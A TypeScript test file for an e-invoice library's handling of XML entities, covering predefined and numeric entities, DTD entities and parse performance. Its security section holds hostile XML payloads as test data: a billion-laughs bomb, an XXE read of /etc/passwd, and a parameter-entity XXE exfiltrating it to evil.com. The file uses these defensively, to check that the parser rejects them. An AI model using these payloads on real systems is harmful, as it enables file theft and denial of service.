486 lines
16 KiB
TypeScript
486 lines
16 KiB
TypeScript
import { expect, tap } from '@git.zone/tstest/tapbundle';
|
||
import * as einvoice from '../../../ts/index.js';
|
||
import * as plugins from '../../plugins.js';
|
||
import { CorpusLoader } from '../../helpers/corpus.loader.js';
|
||
import { PerformanceTracker } from '../../helpers/performance.tracker.js';
|
||
|
||
tap.test('PARSE-09: Entity Reference Resolution - Handle XML entities correctly', async (t) => {
|
||
const performanceTracker = new PerformanceTracker('PARSE-09');
|
||
|
||
await t.test('Predefined XML entities', async () => {
|
||
performanceTracker.startOperation('predefined-entities');
|
||
|
||
const predefinedEntities = [
|
||
{
|
||
name: 'Ampersand',
|
||
entity: '&',
|
||
character: '&',
|
||
description: 'Used in company names and text'
|
||
},
|
||
{
|
||
name: 'Less than',
|
||
entity: '<',
|
||
character: '<',
|
||
description: 'Used in text content'
|
||
},
|
||
{
|
||
name: 'Greater than',
|
||
entity: '>',
|
||
character: '>',
|
||
description: 'Used in text content'
|
||
},
|
||
{
|
||
name: 'Quote',
|
||
entity: '"',
|
||
character: '"',
|
||
description: 'Used in attribute values'
|
||
},
|
||
{
|
||
name: 'Apostrophe',
|
||
entity: ''',
|
||
character: "'",
|
||
description: 'Used in attribute values'
|
||
}
|
||
];
|
||
|
||
for (const entity of predefinedEntities) {
|
||
const startTime = performance.now();
|
||
|
||
const testXml = `<?xml version="1.0"?>
|
||
<invoice>
|
||
<supplier>Test ${entity.entity} Company</supplier>
|
||
<note attribute="${entity.entity}value">Text with ${entity.entity} entity</note>
|
||
</invoice>`;
|
||
|
||
console.log(`${entity.name} entity (${entity.entity}):`);
|
||
console.log(` Character: "${entity.character}"`);
|
||
console.log(` Usage: ${entity.description}`);
|
||
|
||
try {
|
||
const invoice = new einvoice.EInvoice();
|
||
if (invoice.fromXmlString) {
|
||
await invoice.fromXmlString(testXml);
|
||
console.log(' ✓ Entity resolved correctly');
|
||
} else {
|
||
console.log(' ⚠️ Cannot test without fromXmlString');
|
||
}
|
||
} catch (error) {
|
||
console.log(` ✗ Error: ${error.message}`);
|
||
}
|
||
|
||
performanceTracker.recordMetric('predefined-entity', performance.now() - startTime);
|
||
}
|
||
|
||
performanceTracker.endOperation('predefined-entities');
|
||
});
|
||
|
||
await t.test('Numeric character references', async () => {
|
||
performanceTracker.startOperation('numeric-entities');
|
||
|
||
const numericTests = [
|
||
{
|
||
name: 'Decimal references',
|
||
tests: [
|
||
{ ref: 'A', char: 'A', description: 'Latin capital A' },
|
||
{ ref: '€', char: '€', description: 'Euro sign' },
|
||
{ ref: '©', char: '©', description: 'Copyright symbol' },
|
||
{ ref: '™', char: '™', description: 'Trademark symbol' },
|
||
{ ref: '°', char: '°', description: 'Degree symbol' }
|
||
]
|
||
},
|
||
{
|
||
name: 'Hexadecimal references',
|
||
tests: [
|
||
{ ref: 'A', char: 'A', description: 'Latin capital A (hex)' },
|
||
{ ref: '€', char: '€', description: 'Euro sign (hex)' },
|
||
{ ref: '©', char: '©', description: 'Copyright (hex)' },
|
||
{ ref: '™', char: '™', description: 'Trademark (hex)' },
|
||
{ ref: '°', char: '°', description: 'Degree (hex)' }
|
||
]
|
||
}
|
||
];
|
||
|
||
for (const category of numericTests) {
|
||
console.log(`\n${category.name}:`);
|
||
|
||
for (const test of category.tests) {
|
||
const startTime = performance.now();
|
||
|
||
const xml = `<?xml version="1.0"?>
|
||
<invoice>
|
||
<amount currency="${test.ref}EUR">100.00</amount>
|
||
<temperature>${test.ref}C</temperature>
|
||
<copyright>${test.ref} 2024</copyright>
|
||
</invoice>`;
|
||
|
||
console.log(` ${test.ref} = "${test.char}" (${test.description})`);
|
||
|
||
try {
|
||
// Verify entity resolution
|
||
const resolved = xml.replace(new RegExp(test.ref, 'g'), test.char);
|
||
if (resolved.includes(test.char)) {
|
||
console.log(' ✓ Entity would resolve correctly');
|
||
}
|
||
} catch (error) {
|
||
console.log(` ✗ Resolution error: ${error.message}`);
|
||
}
|
||
|
||
performanceTracker.recordMetric('numeric-ref', performance.now() - startTime);
|
||
}
|
||
}
|
||
|
||
performanceTracker.endOperation('numeric-entities');
|
||
});
|
||
|
||
await t.test('Custom entity definitions (DTD)', async () => {
|
||
performanceTracker.startOperation('custom-entities');
|
||
|
||
const customEntityTests = [
|
||
{
|
||
name: 'Internal DTD entities',
|
||
xml: `<?xml version="1.0"?>
|
||
<!DOCTYPE invoice [
|
||
<!ENTITY company "Acme Corporation">
|
||
<!ENTITY address "123 Main Street, London">
|
||
<!ENTITY year "2024">
|
||
<!ENTITY currency "EUR">
|
||
]>
|
||
<invoice>
|
||
<supplier>&company;</supplier>
|
||
<supplierAddress>&address;</supplierAddress>
|
||
<date>01-01-&year;</date>
|
||
<amount currency="¤cy;">1000.00</amount>
|
||
</invoice>`,
|
||
entities: {
|
||
'company': 'Acme Corporation',
|
||
'address': '123 Main Street, London',
|
||
'year': '2024',
|
||
'currency': 'EUR'
|
||
}
|
||
},
|
||
{
|
||
name: 'Parameter entities',
|
||
xml: `<?xml version="1.0"?>
|
||
<!DOCTYPE invoice [
|
||
<!ENTITY % common SYSTEM "common.dtd">
|
||
%common;
|
||
<!ENTITY company "Test Company">
|
||
]>
|
||
<invoice>
|
||
<supplier>&company;</supplier>
|
||
</invoice>`,
|
||
description: 'External parameter entities (security risk)'
|
||
},
|
||
{
|
||
name: 'Nested entity references',
|
||
xml: `<?xml version="1.0"?>
|
||
<!DOCTYPE invoice [
|
||
<!ENTITY city "London">
|
||
<!ENTITY country "UK">
|
||
<!ENTITY fullAddress "&city;, &country;">
|
||
]>
|
||
<invoice>
|
||
<address>&fullAddress;</address>
|
||
</invoice>`,
|
||
expected: 'London, UK'
|
||
}
|
||
];
|
||
|
||
for (const test of customEntityTests) {
|
||
const startTime = performance.now();
|
||
|
||
console.log(`\n${test.name}:`);
|
||
|
||
if (test.entities) {
|
||
console.log(' Defined entities:');
|
||
for (const [name, value] of Object.entries(test.entities)) {
|
||
console.log(` &${name}; = "${value}"`);
|
||
}
|
||
}
|
||
|
||
if (test.description) {
|
||
console.log(` Note: ${test.description}`);
|
||
}
|
||
|
||
if (test.expected) {
|
||
console.log(` Expected result: ${test.expected}`);
|
||
}
|
||
|
||
try {
|
||
const invoice = new einvoice.EInvoice();
|
||
if (invoice.fromXmlString) {
|
||
// Note: Many parsers disable DTD processing by default for security
|
||
await invoice.fromXmlString(test.xml);
|
||
console.log(' ✓ Parsed (DTD support may vary)');
|
||
}
|
||
} catch (error) {
|
||
console.log(` ⚠️ DTD parsing: ${error.message}`);
|
||
console.log(' Note: DTD processing often disabled for security');
|
||
}
|
||
|
||
performanceTracker.recordMetric('custom-entity', performance.now() - startTime);
|
||
}
|
||
|
||
performanceTracker.endOperation('custom-entities');
|
||
});
|
||
|
||
await t.test('Entity security considerations', async () => {
|
||
performanceTracker.startOperation('entity-security');
|
||
|
||
const securityTests = [
|
||
{
|
||
name: 'Billion laughs attack (XML bomb)',
|
||
xml: `<?xml version="1.0"?>
|
||
<!DOCTYPE lolz [
|
||
<!ENTITY lol "lol">
|
||
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
|
||
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
|
||
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
|
||
]>
|
||
<invoice>
|
||
<data>&lol4;</data>
|
||
</invoice>`,
|
||
risk: 'Exponential entity expansion',
|
||
mitigation: 'Disable DTD processing or limit entity expansion'
|
||
},
|
||
{
|
||
name: 'External entity injection (XXE)',
|
||
xml: `<?xml version="1.0"?>
|
||
<!DOCTYPE invoice [
|
||
<!ENTITY xxe SYSTEM "file:///etc/passwd">
|
||
]>
|
||
<invoice>
|
||
<data>&xxe;</data>
|
||
</invoice>`,
|
||
risk: 'File disclosure, SSRF',
|
||
mitigation: 'Disable external entity resolution'
|
||
},
|
||
{
|
||
name: 'Parameter entity XXE',
|
||
xml: `<?xml version="1.0"?>
|
||
<!DOCTYPE invoice [
|
||
<!ENTITY % file SYSTEM "file:///etc/passwd">
|
||
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://evil.com/?data=%file;'>">
|
||
%eval;
|
||
%exfil;
|
||
]>
|
||
<invoice></invoice>`,
|
||
risk: 'Out-of-band data exfiltration',
|
||
mitigation: 'Disable parameter entities'
|
||
}
|
||
];
|
||
|
||
for (const test of securityTests) {
|
||
console.log(`\n${test.name}:`);
|
||
console.log(` Risk: ${test.risk}`);
|
||
console.log(` Mitigation: ${test.mitigation}`);
|
||
|
||
const startTime = performance.now();
|
||
|
||
try {
|
||
const invoice = new einvoice.EInvoice();
|
||
if (invoice.fromXmlString) {
|
||
await invoice.fromXmlString(test.xml);
|
||
console.log(' ⚠️ SECURITY WARNING: Parser allowed dangerous entities!');
|
||
}
|
||
} catch (error) {
|
||
console.log(' ✓ Parser correctly rejected dangerous entities');
|
||
console.log(` Error: ${error.message}`);
|
||
}
|
||
|
||
performanceTracker.recordMetric('security-test', performance.now() - startTime);
|
||
}
|
||
|
||
performanceTracker.endOperation('entity-security');
|
||
});
|
||
|
||
await t.test('Entity usage in e-invoices', async () => {
|
||
performanceTracker.startOperation('einvoice-entities');
|
||
|
||
const einvoicePatterns = [
|
||
{
|
||
name: 'Currency symbols',
|
||
examples: [
|
||
{ text: 'Price in € (EUR)', entity: '€', resolved: '€' },
|
||
{ text: 'Amount in £ (GBP)', entity: '£', resolved: '£' },
|
||
{ text: 'Cost in $ (USD)', entity: '$', resolved: '$' },
|
||
{ text: 'Price in ¥ (JPY)', entity: '¥', resolved: '¥' }
|
||
]
|
||
},
|
||
{
|
||
name: 'Special characters in company names',
|
||
examples: [
|
||
{ text: 'Smith & Jones Ltd.', entity: '&', resolved: '&' },
|
||
{ text: 'AT&T Communications', entity: '&', resolved: '&' },
|
||
{ text: 'L'Oréal Paris', entity: ''', resolved: "'" },
|
||
{ text: '"Best Price" Store', entity: '"', resolved: '"' }
|
||
]
|
||
},
|
||
{
|
||
name: 'Legal symbols',
|
||
examples: [
|
||
{ text: 'Copyright © 2024', entity: '©', resolved: '©' },
|
||
{ text: 'Registered ®', entity: '®', resolved: '®' },
|
||
{ text: 'Trademark ™', entity: '™', resolved: '™' }
|
||
]
|
||
},
|
||
{
|
||
name: 'Mathematical symbols',
|
||
examples: [
|
||
{ text: 'Temperature ±2°C', entity: '±/°', resolved: '±/°' },
|
||
{ text: 'Discount ≤ 50%', entity: '≤', resolved: '≤' },
|
||
{ text: 'Quantity × Price', entity: '×', resolved: '×' }
|
||
]
|
||
}
|
||
];
|
||
|
||
for (const category of einvoicePatterns) {
|
||
console.log(`\n${category.name}:`);
|
||
|
||
for (const example of category.examples) {
|
||
console.log(` "${example.text}"`);
|
||
console.log(` Entity: ${example.entity} → ${example.resolved}`);
|
||
}
|
||
}
|
||
|
||
performanceTracker.endOperation('einvoice-entities');
|
||
});
|
||
|
||
await t.test('Corpus entity analysis', async () => {
|
||
performanceTracker.startOperation('corpus-entities');
|
||
|
||
const corpusLoader = new CorpusLoader();
|
||
const xmlFiles = await corpusLoader.getFiles(/\.(xml|ubl|cii)$/);
|
||
|
||
console.log(`\nAnalyzing entity usage in ${xmlFiles.length} corpus files...`);
|
||
|
||
const entityStats = {
|
||
total: 0,
|
||
filesWithEntities: 0,
|
||
predefinedEntities: new Map<string, number>(),
|
||
numericEntities: 0,
|
||
customEntities: 0,
|
||
dtdFiles: 0
|
||
};
|
||
|
||
const sampleSize = Math.min(100, xmlFiles.length);
|
||
const sampledFiles = xmlFiles.slice(0, sampleSize);
|
||
|
||
for (const file of sampledFiles) {
|
||
entityStats.total++;
|
||
|
||
try {
|
||
const content = await plugins.fs.readFile(file.path, 'utf8');
|
||
let hasEntities = false;
|
||
|
||
// Check for predefined entities
|
||
const predefined = ['&', '<', '>', '"', '''];
|
||
for (const entity of predefined) {
|
||
if (content.includes(entity)) {
|
||
hasEntities = true;
|
||
entityStats.predefinedEntities.set(
|
||
entity,
|
||
(entityStats.predefinedEntities.get(entity) || 0) + 1
|
||
);
|
||
}
|
||
}
|
||
|
||
// Check for numeric entities
|
||
if (/&#\d+;|&#x[\dA-Fa-f]+;/.test(content)) {
|
||
hasEntities = true;
|
||
entityStats.numericEntities++;
|
||
}
|
||
|
||
// Check for DTD
|
||
if (content.includes('<!DOCTYPE') || content.includes('<!ENTITY')) {
|
||
entityStats.dtdFiles++;
|
||
entityStats.customEntities++;
|
||
}
|
||
|
||
if (hasEntities) {
|
||
entityStats.filesWithEntities++;
|
||
}
|
||
} catch (error) {
|
||
// Skip files that can't be read
|
||
}
|
||
}
|
||
|
||
console.log('\nEntity Usage Statistics:');
|
||
console.log(`Files analyzed: ${entityStats.total}`);
|
||
console.log(`Files with entities: ${entityStats.filesWithEntities} (${(entityStats.filesWithEntities/entityStats.total*100).toFixed(1)}%)`);
|
||
|
||
console.log('\nPredefined entities:');
|
||
for (const [entity, count] of entityStats.predefinedEntities.entries()) {
|
||
console.log(` ${entity}: ${count} files`);
|
||
}
|
||
|
||
console.log(`\nNumeric entities: ${entityStats.numericEntities} files`);
|
||
console.log(`DTD declarations: ${entityStats.dtdFiles} files`);
|
||
console.log(`Custom entities: ${entityStats.customEntities} files`);
|
||
|
||
performanceTracker.endOperation('corpus-entities');
|
||
});
|
||
|
||
await t.test('Entity resolution performance', async () => {
|
||
performanceTracker.startOperation('entity-performance');
|
||
|
||
// Generate XML with varying entity density
|
||
const generateXmlWithEntities = (entityCount: number): string => {
|
||
let xml = '<?xml version="1.0"?>\n<invoice>\n';
|
||
|
||
for (let i = 0; i < entityCount; i++) {
|
||
xml += ` <field${i}>Text with & entity € and © symbols</field${i}>\n`;
|
||
}
|
||
|
||
xml += '</invoice>';
|
||
return xml;
|
||
};
|
||
|
||
const testSizes = [10, 100, 500, 1000];
|
||
|
||
console.log('\nEntity resolution performance:');
|
||
|
||
for (const size of testSizes) {
|
||
const xml = generateXmlWithEntities(size);
|
||
const xmlSize = Buffer.byteLength(xml, 'utf8');
|
||
const entityCount = size * 3; // 3 entities per field
|
||
|
||
const startTime = performance.now();
|
||
|
||
try {
|
||
const invoice = new einvoice.EInvoice();
|
||
if (invoice.fromXmlString) {
|
||
await invoice.fromXmlString(xml);
|
||
}
|
||
|
||
const parseTime = performance.now() - startTime;
|
||
|
||
console.log(` ${entityCount} entities (${(xmlSize/1024).toFixed(1)}KB):`);
|
||
console.log(` Parse time: ${parseTime.toFixed(2)}ms`);
|
||
console.log(` Entities/ms: ${(entityCount / parseTime).toFixed(1)}`);
|
||
|
||
performanceTracker.recordMetric(`entities-${size}`, parseTime);
|
||
} catch (error) {
|
||
console.log(` Error with ${size} entities: ${error.message}`);
|
||
}
|
||
}
|
||
|
||
performanceTracker.endOperation('entity-performance');
|
||
});
|
||
|
||
// Performance summary
|
||
console.log('\n' + performanceTracker.getSummary());
|
||
|
||
// Entity handling best practices
|
||
console.log('\nEntity Reference Resolution Best Practices:');
|
||
console.log('1. Always handle predefined XML entities (& < > " ')');
|
||
console.log('2. Support numeric character references (decimal and hex)');
|
||
console.log('3. Be cautious with DTD processing (security risks)');
|
||
console.log('4. Disable external entity resolution by default');
|
||
console.log('5. Limit entity expansion depth to prevent attacks');
|
||
console.log('6. Validate resolved content after entity expansion');
|
||
console.log('7. Consider entity usage impact on performance');
|
||
console.log('8. Document security settings clearly for users');
|
||
});
|
||
|
||
tap.start(); |